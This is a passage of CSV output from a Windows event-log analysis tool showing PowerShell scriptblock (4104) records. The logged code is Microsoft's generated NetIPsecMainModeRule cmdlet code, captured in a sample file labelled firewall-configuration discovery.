[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociat",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"edNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { 
[object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and 
$PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 